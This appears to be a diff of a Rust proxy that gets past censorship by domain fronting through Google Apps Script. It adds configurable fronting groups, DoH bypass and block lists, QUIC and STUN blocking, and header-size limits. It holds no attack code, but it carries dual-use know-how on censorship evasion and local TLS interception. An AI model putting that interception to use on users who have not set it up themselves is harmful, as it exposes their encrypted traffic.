+    let e = entry.trim().trim_end_matches('.').to_ascii_lowercase();
+    let e = e.strip_prefix('.').unwrap_or(&e);
+    if e.is_empty() {
+        return false;
+    }
+    h == e || h.ends_with(&format!(".{}", e))
+}
+
+pub fn matches_doh_host(host: &str, extra: &[String]) -> bool {
+    let h = host.to_ascii_lowercase();
+    let h = h.trim_end_matches('.');
+    if h.is_empty() {
+        return false;
+    }
+    if DEFAULT_DOH_HOSTS
+        .iter()
+        .any(|s| host_matches_doh_entry(h, s))
+    {
+        return true;
+    }
+    extra.iter().any(|s| host_matches_doh_entry(h, s))
+}
+
+/// A `FrontingGroup` after one-time validation: the group's `sni` is
+/// parsed into a `ServerName` so we don't repay that on every dialed
+/// connection, and domain entries are pre-lower-cased + dot-trimmed
+/// so the per-request match path is just byte comparisons.
+#[derive(Debug, Clone)]
+pub struct FrontingGroupResolved {
+    pub name: String,
+    pub ip: String,
+    pub sni: String,
+    pub server_name: ServerName<'static>,
+    domains_normalized: Vec<String>,
+}
+
+impl FrontingGroupResolved {
+    fn from_config(g: &FrontingGroup) -> Result<Self, String> {
+        let server_name = ServerName::try_from(g.sni.clone())
+            .map_err(|e| format!("invalid sni '{}': {}", g.sni, e))?;
+        let domains_normalized = g
+            .domains
+            .iter()
+            .map(|d| d.trim().trim_end_matches('.').to_ascii_lowercase())
+            .filter(|d| !d.is_empty())
+            .collect();
+        Ok(Self {
+            name: g.name.clone(),
+            ip: g.ip.clone(),
+            sni: g.sni.clone(),
+            server_name,
+            domains_normalized,
+        })
+    }
+}
+
+/// First fronting group whose domain list contains `host`, if any.
+/// Match is case-insensitive and unconditionally suffix-anchored: an
+/// entry `vercel.com` matches both `vercel.com` and `*.vercel.com`.
+/// This is the right shape for fronting because every legitimate
+/// subdomain of a fronted domain is itself fronted by the same edge
+/// — requiring users to spell out every subdomain would be a footgun.
+/// Same matching shape as the DoH host list. First match wins, so
+/// users can put more-specific groups earlier when entries would
+/// otherwise overlap.
+pub fn match_fronting_group<'a>(
+    host: &str,
+    groups: &'a [Arc<FrontingGroupResolved>],
+) -> Option<&'a Arc<FrontingGroupResolved>> {
+    if groups.is_empty() {
+        return None;
+    }
+    let h = host.to_ascii_lowercase();
+    let h = h.trim_end_matches('.');
+    if h.is_empty() {
+        return None;
+    }
+    for g in groups {
+        for d in &g.domains_normalized {
+            if is_dot_anchored_match(h, d) {
+                return Some(g);
+            }
+        }
+    }
+    None
+}
+
+/// True if `host` equals `entry` exactly OR is a strict dot-anchored
+/// suffix of it (i.e. `entry == "vercel.com"` matches `host ==
+/// "app.vercel.com"` but not `host == "xvercel.com"`). Both inputs
+/// must already be lowercase + trailing-dot trimmed; the function
+/// does no allocation, unlike the obvious `format!(".{}", entry)`
+/// implementation that allocates per call.
+#[inline]
+fn is_dot_anchored_match(host: &str, entry: &str) -> bool {
+    if host == entry {
+        return true;
+    }
+    let hb = host.as_bytes();
+    let eb = entry.as_bytes();
+    hb.len() > eb.len()
+        && hb.ends_with(eb)
+        && hb[hb.len() - eb.len() - 1] == b'.'
 }
 
 /// True if `host` matches any entry in the user's passthrough list.
@@ -181,16 +410,16 @@ impl ProxyServer {
             .mode_kind()
             .map_err(|e| std::io::Error::new(std::io::ErrorKind::InvalidInput, format!("{e}")))?;
 
-        // `google_only` mode skips the Apps Script relay entirely, so we must
+        // `direct` mode skips the Apps Script relay entirely, so we must
         // not try to construct the DomainFronter — it errors on a missing
-        // `script_id`, which is exactly the state a bootstrapping user is in.
+        // `script_id`, which is exactly the state a direct-mode user is in.
         let fronter = match mode {
             Mode::AppsScript | Mode::Full => {
                 let f = DomainFronter::new(config)
                     .map_err(|e| std::io::Error::new(std::io::ErrorKind::Other, format!("{e}")))?;
                 Some(Arc::new(f))
             }
-            Mode::GoogleOnly => None,
+            Mode::Direct => None,
         };
 
         let tls_config = if config.verify_ssl {
@@ -207,6 +436,68 @@ impl ProxyServer {
         };
         let tls_connector = TlsConnector::from(Arc::new(tls_config));
 
+        // Surface a config combo that is otherwise silently inert: extras
+        // listed under `bypass_doh_hosts` only take effect when the bypass
+        // itself is on. A user who set `tunnel_doh: true` *and* populated
+        // the extras list almost certainly didn't mean to disable the
+        // feature their custom hosts feed into.
+        if config.tunnel_doh && !config.bypass_doh_hosts.is_empty() {
+            tracing::warn!(
+                "config: bypass_doh_hosts has {} entries but tunnel_doh=true — \
+                 the bypass is off, so the extras have no effect. Set \
+                 tunnel_doh=false (or omit it) to use them.",
+                config.bypass_doh_hosts.len()
+            );
+        }
+
+        // Same-shape warning for fronting_groups in full mode. The dispatch
+        // short-circuits to the tunnel mux before the fronting_groups check
+        // (full mode preserves end-to-end TLS, fronting_groups requires
+        // MITM), so groups configured here will never fire. Surface this
+        // at startup rather than letting users wonder why their Vercel
+        // domains never hit the configured edge.
+        if mode == Mode::Full && !config.fronting_groups.is_empty() {
+            tracing::warn!(
+                "config: fronting_groups has {} entries but mode=full — \
+                 full mode tunnels everything end-to-end through Apps Script \
+                 (no MITM), so groups never fire. Switch to mode=apps_script \
+                 or mode=direct to use them, or remove the groups to silence \
+                 this warning.",
+                config.fronting_groups.len()
+            );
+        }
+
+        let mut fronting_groups: Vec<Arc<FrontingGroupResolved>> =
+            Vec::with_capacity(config.fronting_groups.len());
+        let mut seen_names: std::collections::HashSet<String> = Default::default();
+        for g in &config.fronting_groups {
+            let resolved = FrontingGroupResolved::from_config(g).map_err(|e| {
+                std::io::Error::new(
+                    std::io::ErrorKind::InvalidInput,
+                    format!("fronting_groups['{}']: {}", g.name, e),
+                )
+            })?;
+            // Surface duplicate group names at startup. Not a hard
+            // error — copy-pasted configs can land here legitimately
+            // — but log lines key on `name` and dedup ambiguity makes
+            // them unreadable.
+            if !seen_names.insert(resolved.name.clone()) {
+                tracing::warn!(
+                    "fronting group name '{}' is used by more than one group; \
+                     log lines that reference the name will be ambiguous",
+                    resolved.name
+                );
+            }
+            tracing::info!(
+                "fronting group '{}': sni={} ip={} domains={}",
+                resolved.name,
+                resolved.sni,
+                resolved.ip,
+                resolved.domains_normalized.len()
+            );
+            fronting_groups.push(Arc::new(resolved));
+        }
+
         let rewrite_ctx = Arc::new(RewriteCtx {
             google_ip: config.google_ip.clone(),
             front_domain: config.front_domain.clone(),
@@ -216,6 +507,12 @@ impl ProxyServer {
             mode,
             youtube_via_relay: config.youtube_via_relay,
             passthrough_hosts: config.passthrough_hosts.clone(),
+            block_quic: config.block_quic,
+            block_stun: config.block_stun,
+            bypass_doh: !config.tunnel_doh,
+            block_doh: config.block_doh,
+            bypass_doh_hosts: config.bypass_doh_hosts.clone(),
+            fronting_groups,
         });
 
         let socks5_port = config.socks5_port.unwrap_or(config.listen_port + 1);
@@ -228,6 +525,8 @@ impl ProxyServer {
             mitm,
             rewrite_ctx,
             tunnel_mux: None, // initialized in run() inside the tokio runtime
+            coalesce_step_ms: if config.coalesce_step_ms > 0 { config.coalesce_step_ms as u64 } else { 10 },
+            coalesce_max_ms: if config.coalesce_max_ms > 0 { config.coalesce_max_ms as u64 } else { 1000 },
         })
     }
 
@@ -241,7 +540,7 @@ impl ProxyServer {
         // Initialize TunnelMux inside the runtime (tokio::spawn requires it).
         if self.rewrite_ctx.mode == Mode::Full {
             if let Some(f) = self.fronter.as_ref() {
-                self.tunnel_mux = Some(TunnelMux::start(f.clone()));
+                self.tunnel_mux = Some(TunnelMux::start(f.clone(), self.coalesce_step_ms, self.coalesce_max_ms));
             }
         }
 
@@ -259,14 +558,54 @@ impl ProxyServer {
         );
         // Pre-warm the outbound connection pool so the user's first request
         // doesn't pay a fresh TLS handshake to Google edge. Best-effort;
-        // failures are logged and ignored. Skipped in `google_only` — there
-        // is no fronter to warm.
+        // failures are logged and ignored. Skipped in `direct` mode —
+        // there is no fronter to warm.
+        //
+        // Sized to roughly match a browser's parallel-connection burst at
+        // startup. The previous fixed `3` was fine for a single deployment
+        // but left requests 4-10 of the opening burst paying a cold TLS
+        // handshake each (~300ms). Scaling with deployment count gives
+        // multi-account configs a proportionally warmer pool, capped so
+        // single-deployment users don't hammer Google edge unnecessarily.
         if let Some(warm_fronter) = self.fronter.clone() {
+            let n = warm_fronter.num_scripts().clamp(6, 16);
             tokio::spawn(async move {
-                warm_fronter.warm(3).await;
+                warm_fronter.warm(n).await;
             });
         }
 
+        // Apps Script container keepalive. `warm()` above keeps the TCP
+        // pool warm at startup, but the V8 container behind UrlFetchApp
+        // goes cold after ~5min idle and costs 1-3s to wake. A periodic
+        // HEAD ping prevents the cold-start lag on the first request
+        // after a quiet pause (most visible as YouTube player stalls).
+        // Skipped in direct mode for the same reason as warm —
+        // there's no fronter to ping.
+        //
+        // The handle is captured (not fire-and-forget) so the shutdown
+        // arm of the select! below can abort it. Without that, hitting
+        // Stop in the UI would leave the keepalive holding an
+        // Arc<DomainFronter> on stale config and pinging Apps Script
+        // every 240s — same class of bug that issue #99 hit for the
+        // accept loops.
+        let keepalive_task = if let Some(keepalive_fronter) = self.fronter.clone() {
+            tokio::spawn(async move {
+                keepalive_fronter.run_keepalive().await;
+            })
+        } else {
+            tokio::spawn(async move { std::future::pending::<()>().await })
+        };
+
+        // Background pool refill: keeps at least POOL_MIN ready TLS
+        // connections so acquire() never pays a cold handshake.
+        let refill_task = if let Some(refill_fronter) = self.fronter.clone() {
+            tokio::spawn(async move {
+                refill_fronter.run_pool_refill().await;
+            })
+        } else {
+            tokio::spawn(async move { std::future::pending::<()>().await })
+        };
+
         let stats_task = if let Some(stats_fronter) = self.fronter.clone() {
             tokio::spawn(async move {
                 let mut ticker = tokio::time::interval(std::time::Duration::from_secs(60));
@@ -374,6 +713,8 @@ impl ProxyServer {
             _ = &mut shutdown_rx => {
                 tracing::info!("Shutdown signal received, stopping listeners");
                 stats_task.abort();
+                keepalive_task.abort();
+                refill_task.abort();
                 http_task.abort();
                 socks_task.abort();
             }
@@ -447,8 +788,26 @@ async fn handle_http_client(
     tunnel_mux: Option<Arc<TunnelMux>>,
 ) -> std::io::Result<()> {
     let (head, leftover) = match read_http_head(&mut sock).await? {
-        Some(v) => v,
-        None => return Ok(()),
+        HeadReadResult::Got { head, leftover } => (head, leftover),
+        HeadReadResult::Closed => return Ok(()),
+        HeadReadResult::Oversized => {
+            // Reply with 431 instead of just dropping the socket so the
+            // browser shows a real error rather than retrying the same
+            // oversized request in a loop.
+            tracing::warn!(
+                "request head exceeds {} bytes — refusing with 431",
+                MAX_HEADER_BYTES
+            );
+            let _ = sock
+                .write_all(
+                    b"HTTP/1.1 431 Request Header Fields Too Large\r\n\
+                      Connection: close\r\n\
+                      Content-Length: 0\r\n\r\n",
+                )
+                .await;
+            let _ = sock.flush().await;
+            return Ok(());
+        }
     };
 
     let (method, target, _version, _headers) = parse_request_head(&head)
@@ -456,30 +815,41 @@ async fn handle_http_client(
 
     if method.eq_ignore_ascii_case("CONNECT") {
         let (host, port) = parse_host_port(&target);
+        // Mirror the SOCKS5 short-circuit: if the tunnel-node just failed
+        // this (host, port) with unreachable, return 502 immediately rather
+        // than acknowledging the CONNECT and blowing tunnel quota on a
+        // guaranteed retry. See `TunnelMux::is_unreachable` for context.
+        if let Some(ref mux) = tunnel_mux {
+            if mux.is_unreachable(&host, port) {
+                tracing::info!("CONNECT {}:{} (negative-cached, refusing)", host, port);
+                let _ = sock
+                    .write_all(b"HTTP/1.1 502 Bad Gateway\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
+                    .await;
+                let _ = sock.flush().await;
+                return Ok(());
+            }
+        }
         sock.write_all(b"HTTP/1.1 200 Connection Established\r\n\r\n")
             .await?;
         sock.flush().await?;
         dispatch_tunnel(sock, host, port, fronter, mitm, rewrite_ctx, tunnel_mux).await
     } else {
-        // Plain HTTP proxy request (e.g. `GET http://…`). The Apps Script
-        // relay is the only code path that can fulfil this, so in google_only
-        // bootstrap mode we return a clear 502 instead.
+        // Plain HTTP proxy request (e.g. `GET http://…`).
+        //
+        // apps_script mode: relay through the Apps Script fronter (which
+        // is the whole point of the relay).
+        //
+        // direct mode: no fronter exists, so passthrough as raw TCP.
+        // Same contract as `dispatch_tunnel` honors for CONNECT in
+        // direct mode — anything not on the Google edge / not in a
+        // configured fronting_group is forwarded direct (or via
+        // `upstream_socks5`) so the user's browser still works while
+        // they finish setting up Apps Script. Issue: typing a bare
+        // `http://example.com` URL used to return a 502 here even
+        // though `https://example.com` (CONNECT) worked fine.
         match fronter {
             Some(f) => do_plain_http(sock, &head, &leftover, f).await,
-            None => {
-                let _ = sock
-                    .write_all(
-                        b"HTTP/1.1 502 Bad Gateway\r\n\
-                          Content-Type: text/plain; charset=utf-8\r\n\
-                          Content-Length: 120\r\n\
-                          Connection: close\r\n\r\n\
-                          google_only mode: plain HTTP proxy requests are not supported. \
-                          Browse https over CONNECT, or switch to apps_script mode.",
-                    )
-                    .await;
-                let _ = sock.flush().await;
-                Ok(())
-            }
+            None => do_plain_http_passthrough(sock, &head, &leftover, &rewrite_ctx).await,
         }
     }
 }
@@ -557,6 +927,32 @@ async fn handle_socks5_client(
         return handle_socks5_udp_associate(sock, rewrite_ctx, tunnel_mux).await;
     }
 
+    // Negative-cache short-circuit: if the tunnel-node just failed to reach
+    // this exact (host, port) with `Network is unreachable` / `No route to
+    // host`, reply 0x04 (Host unreachable) immediately. Saves a 1.5–2s tunnel
+    // round-trip on guaranteed-failing targets — the IPv6 probe retry loop
+    // is the main offender on devices without IPv6.
+    if let Some(ref mux) = tunnel_mux {
+        if mux.is_unreachable(&host, port) {
+            tracing::info!("SOCKS5 CONNECT -> {}:{} (negative-cached, refusing)", host, port);
+            sock.write_all(&[0x05, 0x04, 0x00, 0x01, 0, 0, 0, 0, 0, 0])
+                .await?;
+            sock.flush().await?;
+            return Ok(());
+        }
+    }
+
+    // Reject STUN/TURN UDP ports immediately so WebRTC (Meet,
+    // Telegram calls) skips UDP ICE candidates and falls back to
+    // TCP TURN on :443 without waiting for a timeout.
+    if rewrite_ctx.block_stun && matches!(port, 3478 | 5349 | 19302) {
+        tracing::info!("SOCKS5 CONNECT -> {}:{} (STUN/TURN blocked, forcing TCP fallback)", host, port);
+        sock.write_all(&[0x05, 0x05, 0x00, 0x01, 0, 0, 0, 0, 0, 0])
+            .await?;
+        sock.flush().await?;
+        return Ok(());
+    }
+
     tracing::info!("SOCKS5 CONNECT -> {}:{}", host, port);
 
     // Success reply with zeroed BND.
@@ -583,7 +979,7 @@ struct SocksUdpTarget {
 /// to abort mid-await.
 struct UdpRelaySession {
     sid: String,
-    uplink: mpsc::Sender<Vec<u8>>,
+    uplink: mpsc::Sender<Bytes>,
 }
 
 /// All per-ASSOCIATE UDP relay state behind a single mutex so insertion
@@ -609,7 +1005,7 @@ impl UdpRelayState {
         }
     }
 
-    fn get_uplink(&self, target: &SocksUdpTarget) -> Option<mpsc::Sender<Vec<u8>>> {
+    fn get_uplink(&self, target: &SocksUdpTarget) -> Option<mpsc::Sender<Bytes>> {
         self.sessions.get(target).map(|s| s.uplink.clone())
     }
 
@@ -736,7 +1132,15 @@ async fn handle_socks5_udp_associate(
         client_peer_ip
     );
 
-    let mut buf = vec![0u8; SOCKS5_UDP_RECV_BUF_BYTES];
+    // Fixed reusable recv buffer. We deliberately don't go the
+    // `BytesMut::split().freeze()` route here even though `tunnel_loop`
+    // does: in TCP the read region IS the payload, but UDP always
+    // slices the SOCKS5 header off, so we'd be copying out anyway —
+    // and a frozen `Bytes` from the recv buf would refcount-pin the
+    // full ~65 KB allocation behind a tiny DNS reply, ballooning
+    // memory under bursts. Right-sized `Bytes::copy_from_slice` on
+    // accepted payloads keeps retention proportional to actual data.
+    let mut recv_buf = vec![0u8; SOCKS5_UDP_RECV_BUF_BYTES];
     let mut control_buf = [0u8; 1];
     let mut client_addr: Option<SocketAddr> = None;
     let state: Arc<Mutex<UdpRelayState>> = Arc::new(Mutex::new(UdpRelayState::new()));
@@ -752,7 +1156,7 @@ async fn handle_socks5_udp_associate(
 
     loop {
         tokio::select! {
-            recv = udp.recv_from(&mut buf) => {
+            recv = udp.recv_from(&mut recv_buf) => {
                 let (n, peer) = match recv {
                     Ok(v) => v,
                     Err(e) => {
@@ -760,6 +1164,7 @@ async fn handle_socks5_udp_associate(
                         break;
                     }
                 };
+
                 // Source-IP check: anything not from the SOCKS5 client's
                 // host is dropped silently.
                 if peer.ip() != client_peer_ip {
@@ -780,9 +1185,34 @@ async fn handle_socks5_udp_associate(
                 // can race one bad packet to DoS the legitimate client
                 // (whose real datagram, sent from a different ephemeral
                 // port, would then be silently rejected).
-                let Some((target, payload)) = parse_socks5_udp_packet(&buf[..n]) else {
+                let Some((target, payload_off)) = parse_socks5_udp_packet_offsets(&recv_buf[..n]) else {
                     continue;
                 };
+                let payload_slice = &recv_buf[payload_off..n];
+
+                // Issue #213: client-side QUIC block. UDP/443 is
+                // HTTP/3 — drop the datagram silently so the client
+                // stack retries a couple of times and then falls back
+                // to TCP/HTTPS, which goes through the regular CONNECT
+                // path. Skipping this at the SOCKS5 layer (rather than
+                // letting it hit the tunnel-node) avoids paying the
+                // 200–500 ms tunnel-node round-trip per dropped QUIC
+                // datagram, which would otherwise compound during the
+                // 1–3 retries before the browser falls back.
+                //
+                // Silent drop instead of an explicit error reply: the
+                // SOCKS5 UDP wire has no "destination unreachable"
+                // datagram — `0x04` only exists in TCP CONNECT replies
+                // (RFC 1928 §6). The browser's QUIC stack already has
+                // a "no response → fall back" timeout, so silent drop
+                // is the contractually correct shape.
+                if rewrite_ctx.block_quic && target.port == 443 {
+                    tracing::debug!(
+                        "udp dropped: block_quic=true, target {}:443",
+                        target.host
+                    );
+                    continue;
+                }
 
                 // RFC 1928 §6: lock to the first VALID datagram's source
                 // port. Subsequent datagrams must come from the same
@@ -800,19 +1230,26 @@ async fn handle_socks5_udp_associate(
                 // the mux. Each datagram costs ~payload * 1.33 in the
                 // batched JSON envelope plus tunnel-node CPU; uncapped,
                 // a runaway client can exhaust Apps Script quota.
-                if payload.len() > MAX_UDP_PAYLOAD_BYTES {
+                if payload_slice.len() > MAX_UDP_PAYLOAD_BYTES {
                     oversized_dropped += 1;
                     if oversized_dropped == 1 || oversized_dropped.is_multiple_of(100) {
                         tracing::debug!(
                             "udp datagram dropped: {} B > {} B (count={})",
-                            payload.len(),
+                            payload_slice.len(),
                             MAX_UDP_PAYLOAD_BYTES,
                             oversized_dropped,
                         );
                     }
                     continue;
                 }
-                let payload = payload.to_vec();
+
+                // Right-sized copy: the queued/in-flight payload owns its
+                // own allocation, so the recv buffer can be reused on the
+                // next iteration without keeping every queued datagram
+                // alive. Sized to the actual payload (≤ MAX_UDP_PAYLOAD_BYTES
+                // = 9 KB after the guard above), not the full ~65 KB recv
+                // buffer.
+                let payload = Bytes::copy_from_slice(payload_slice);
 
                 // Fast path: existing session — push payload onto its
                 // bounded uplink queue, drop on overflow (UDP semantics).
@@ -886,7 +1323,7 @@ async fn handle_socks5_udp_associate(
                     continue;
                 }
 
-                let (uplink_tx, uplink_rx) = mpsc::channel::<Vec<u8>>(UDP_UPLINK_QUEUE);
+                let (uplink_tx, uplink_rx) = mpsc::channel::<Bytes>(UDP_UPLINK_QUEUE);
                 let task_mux = mux.clone();
                 let task_udp = udp.clone();
                 let task_target = target.clone();
@@ -959,7 +1396,7 @@ async fn udp_session_task(
     sid: String,
     target: SocksUdpTarget,
     client_addr: SocketAddr,
-    mut uplink_rx: mpsc::Receiver<Vec<u8>>,
+    mut uplink_rx: mpsc::Receiver<Bytes>,
 ) {
     let mut backoff = UDP_INITIAL_POLL_DELAY;
     loop {
@@ -1067,7 +1504,20 @@ async fn write_socks5_reply(
     sock.flush().await
 }
 
-fn parse_socks5_udp_packet(buf: &[u8]) -> Option<(SocksUdpTarget, &[u8])> {
+/// Parse the SOCKS5 UDP frame header and return the target plus the byte
+/// offset at which the payload starts. Splitting "structure parsing"
+/// from "give me a payload slice" lets the recv hot path stay on a
+/// fixed reusable `Vec<u8>` buffer and only allocate a right-sized
+/// `Bytes::copy_from_slice(&recv_buf[off..n])` for accepted payloads
+/// (after the size guard). DO NOT change this back to a zero-copy
+/// `Bytes::slice` path: that was tried and reverted because slicing
+/// the recv buffer with `bytes` 1.x refcounts the whole ~65 KB
+/// allocation, so a queued tiny DNS reply pinned the full datagram-
+/// sized buffer until it drained — burst retention regressed by
+/// orders of magnitude on UDP-heavy workloads. The thin
+/// `parse_socks5_udp_packet` wrapper below keeps existing `&[u8]`
+/// callers (tests) working.
+fn parse_socks5_udp_packet_offsets(buf: &[u8]) -> Option<(SocksUdpTarget, usize)> {
     if buf.len() < 4 || buf[0] != 0 || buf[1] != 0 || buf[2] != 0 {
         return None;
     }
@@ -1122,10 +1572,15 @@ fn parse_socks5_udp_packet(buf: &[u8]) -> Option<(SocksUdpTarget, &[u8])> {
             atyp,
             addr,
         },
-        &buf[pos..],
+        pos,
     ))
 }
 
+fn parse_socks5_udp_packet(buf: &[u8]) -> Option<(SocksUdpTarget, &[u8])> {
+    let (target, off) = parse_socks5_udp_packet_offsets(buf)?;
+    Some((target, &buf[off..]))
+}
+
 fn build_socks5_udp_packet(target: &SocksUdpTarget, payload: &[u8]) -> Vec<u8> {
     let mut out = Vec::with_capacity(4 + target.addr.len() + 2 + payload.len() + 1);
     out.extend_from_slice(&[0, 0, 0, target.atyp]);
@@ -1190,6 +1645,40 @@ async fn dispatch_tunnel(
         return Ok(());
     }
 
+    // 0.4. DoH block. Reject connections to known DoH endpoints so browsers
+    //      fall back to system DNS (tun2proxy virtual DNS — instant).
+    //      Takes priority over bypass_doh.
+    if rewrite_ctx.block_doh
+        && port == 443
+        && matches_doh_host(&host, &rewrite_ctx.bypass_doh_hosts)
+    {
+        tracing::info!("dispatch {}:{} -> blocked (block_doh)", host, port);
+        drop(sock);
+        return Ok(());
+    }
+
+    // 0.5. DoH bypass. DNS-over-HTTPS is the dominant per-flow DNS cost
+    //      in Full mode (every browser name lookup costs a ~2 s Apps
+    //      Script round-trip), and the tunnel adds no privacy beyond
+    //      what DoH already provides. Route known DoH hosts directly.
+    //      Port-gated to 443 so a non-TLS CONNECT to e.g. `dns.google:80`
+    //      doesn't get diverted off-tunnel by accident.
+    //      See `DEFAULT_DOH_HOSTS` and config.rs `tunnel_doh`.
+    if rewrite_ctx.bypass_doh
+        && port == 443
+        && matches_doh_host(&host, &rewrite_ctx.bypass_doh_hosts)
+    {
+        let via = rewrite_ctx.upstream_socks5.as_deref();
+        tracing::info!(
+            "dispatch {}:{} -> raw-tcp ({}) (doh bypass)",
+            host,
+            port,
+            via.unwrap_or("direct")
+        );
+        plain_tcp_passthrough(sock, &host, port, via).await;
+        return Ok(());
+    }
+
     // 1. Full tunnel mode: ALL traffic goes through the batch multiplexer
     //    (Apps Script → tunnel node → real TCP). No MITM, no cert.
     if rewrite_ctx.mode == Mode::Full {
@@ -1209,6 +1698,40 @@ async fn dispatch_tunnel(
         return Ok(());
     }
 
+    // 2a. User-configured fronting groups (Vercel, Fastly, etc.). Wins
+    //     over the built-in Google SNI-rewrite suffix list — if a user
+    //     adds e.g. `vercel.com` to a Vercel fronting group, we hit
+    //     Vercel's edge with sni=react.dev rather than trying to resolve
+    //     it through Google's. Port-gated to 443: SNI-rewrite needs a
+    //     real ClientHello and a non-TLS CONNECT to the same hostname
+    //     would just hang. Only HTTPS sites are fronted by these CDNs in
+    //     practice, so the gate has no false negatives we care about.
+    if port == 443 {
+        // `Arc::clone` here is refcount-only; we hold it across the
+        // await below without keeping `rewrite_ctx` borrowed.
+        let group_match =
+            match_fronting_group(&host, &rewrite_ctx.fronting_groups).map(Arc::clone);
+        if let Some(group) = group_match {
+            tracing::info!(
+                "dispatch {}:{} -> sni-rewrite tunnel (fronting group '{}', edge {} sni={})",
+                host,
+                port,
+                group.name,
+                group.ip,
+                group.sni
+            );
+            return do_sni_rewrite_tunnel_from_tcp(
+                sock,
+                &host,
+                port,
+                mitm,
+                rewrite_ctx,
+                Some(group),
+            )
+            .await;
+        }
+    }
+
     // 2. Explicit hosts override or SNI-rewrite suffix: for HTTPS targets,
     //    use the TLS SNI-rewrite tunnel (skipped in full mode above).
     if should_use_sni_rewrite(
@@ -1222,17 +1745,18 @@ async fn dispatch_tunnel(
             host,
             port
         );
-        return do_sni_rewrite_tunnel_from_tcp(sock, &host, port, mitm, rewrite_ctx).await;
+        return do_sni_rewrite_tunnel_from_tcp(sock, &host, port, mitm, rewrite_ctx, None).await;
     }
 
-    // 3. google_only bootstrap: no Apps Script relay exists. Anything that
-    //    isn't SNI-rewrite-matched gets direct TCP passthrough so the user's
-    //    browser still works while they're deploying Code.gs. They'd switch
-    //    to apps_script mode for the real DPI bypass.
-    if rewrite_ctx.mode == Mode::GoogleOnly {
+    // 3. direct mode: no Apps Script relay exists. Anything that isn't
+    //    SNI-rewrite-matched (Google edge or a configured fronting_group)
+    //    gets raw TCP passthrough so the user's browser still works while
+    //    they're deploying Code.gs. They'd switch to apps_script mode for
+    //    full DPI bypass.
+    if rewrite_ctx.mode == Mode::Direct {
         let via = rewrite_ctx.upstream_socks5.as_deref();
         tracing::info!(
-            "dispatch {}:{} -> raw-tcp ({}) (google_only: no relay)",
+            "dispatch {}:{} -> raw-tcp ({}) (direct mode: no relay)",
             host,
             port,
             via.unwrap_or("direct")
@@ -1499,14 +2023,35 @@ fn looks_like_http(first_bytes: &[u8]) -> bool {
 /// Read an HTTP head (request line + headers) up to the first \r\n\r\n.
 /// Returns (head_bytes, leftover_after_head). The leftover may contain part
 /// of the request body already received.
-async fn read_http_head(sock: &mut TcpStream) -> std::io::Result<Option<(Vec<u8>, Vec<u8>)>> {
+/// Maximum size of an HTTP request head (request line + all headers).
+///
+/// Set to match upstream Python's `MAX_HEADER_BYTES` (64 KB,
+/// masterking32/MasterHttpRelayVPN constants.py). Real browsers
+/// virtually never exceed ~16 KB; anything past 64 KB is either a
+/// buggy client or a deliberate slowloris-style header bomb.
+/// Previously 1 MB, which let a misbehaving client allocate a lot
+/// of memory before failing.
+const MAX_HEADER_BYTES: usize = 64 * 1024;
+
+/// Result of `read_http_head` / `read_http_head_io`.
+/// `Oversized` is distinct from other I/O errors so the caller can
+/// reply with `431 Request Header Fields Too Large` instead of just
+/// dropping the connection (which a browser would silently retry,
+/// reproducing the same problem).
+enum HeadReadResult {
+    Got { head: Vec<u8>, leftover: Vec<u8> },
+    Closed,
+    Oversized,
+}
+
+async fn read_http_head(sock: &mut TcpStream) -> std::io::Result<HeadReadResult> {
     let mut buf = Vec::with_capacity(4096);
     let mut tmp = [0u8; 4096];
     loop {
         let n = sock.read(&mut tmp).await?;
         if n == 0 {
             return if buf.is_empty() {
-                Ok(None)
+                Ok(HeadReadResult::Closed)
             } else {
                 Err(std::io::Error::new(
                     std::io::ErrorKind::UnexpectedEof,
@@ -1518,13 +2063,10 @@ async fn read_http_head(sock: &mut TcpStream) -> std::io::Result<Option<(Vec<u8>
         if let Some(pos) = find_headers_end(&buf) {
             let head = buf[..pos].to_vec();
             let leftover = buf[pos..].to_vec();
-            return Ok(Some((head, leftover)));
+            return Ok(HeadReadResult::Got { head, leftover });
         }
-        if buf.len() > 1024 * 1024 {
-            return Err(std::io::Error::new(
-                std::io::ErrorKind::InvalidData,
-                "headers too large",
-            ));
+        if buf.len() > MAX_HEADER_BYTES {
+            return Ok(HeadReadResult::Oversized);
         }
     }
 }
@@ -1680,17 +2222,37 @@ async fn do_sni_rewrite_tunnel_from_tcp(
     port: u16,
     mitm: Arc<Mutex<MitmCertManager>>,
     rewrite_ctx: Arc<RewriteCtx>,
+    // When Some, overrides the default Google edge target with a
+    // user-configured fronting group's (ip, sni). `Arc` so the
+    // dispatcher hands us a refcount-only clone — the resolved
+    // group also carries the matcher's normalized domain list which
+    // we don't need here. None = built-in Google edge path.
+    group: Option<Arc<FrontingGroupResolved>>,
 ) -> std::io::Result<()> {
-    let target_ip = hosts_override(&rewrite_ctx.hosts, host)
-        .map(|s| s.to_string())
-        .unwrap_or_else(|| rewrite_ctx.google_ip.clone());
+    let (target_ip, outbound_sni, server_name) = match &group {
+        Some(g) => (g.ip.clone(), g.sni.clone(), g.server_name.clone()),
+        None => {
+            let ip = hosts_override(&rewrite_ctx.hosts, host)
+                .map(|s| s.to_string())
+                .unwrap_or_else(|| rewrite_ctx.google_ip.clone());
+            let sni = rewrite_ctx.front_domain.clone();
+            let sn = match ServerName::try_from(sni.clone()) {
+                Ok(n) => n,
+                Err(e) => {
+                    tracing::error!("invalid front_domain '{}': {}", sni, e);
+                    return Ok(());
+                }
+            };
+            (ip, sni, sn)
+        }
+    };
 
     tracing::info!(
         "SNI-rewrite tunnel -> {}:{} via {} (outbound SNI={})",
         host,
         port,
         target_ip,
-        rewrite_ctx.front_domain
+        outbound_sni
     );
 
     // Accept browser TLS with a cert we sign for `host`.
@@ -1734,13 +2296,6 @@ async fn do_sni_rewrite_tunnel_from_tcp(
     };
     let _ = upstream_tcp.set_nodelay(true);
 
-    let server_name = match ServerName::try_from(rewrite_ctx.front_domain.clone()) {
-        Ok(n) => n,
-        Err(e) => {
-            tracing::error!("invalid front_domain '{}': {}", rewrite_ctx.front_domain, e);
-            return Ok(());
-        }
-    };
     let outbound = match rewrite_ctx
         .tls_connector
         .connect(server_name, upstream_tcp)
@@ -1833,8 +2388,31 @@ where
     S: tokio::io::AsyncRead + tokio::io::AsyncWrite + Unpin,
 {
     let (head, leftover) = match read_http_head_io(stream).await? {
-        Some(v) => v,
-        None => return Ok(false),
+        HeadReadResult::Got { head, leftover } => (head, leftover),
+        HeadReadResult::Closed => return Ok(false),
+        HeadReadResult::Oversized => {
+            // Inside MITM: same reasoning as the plaintext path. Return
+            // 431 over the decrypted stream so the browser surfaces a
+            // real error to the user instead of looping a connection
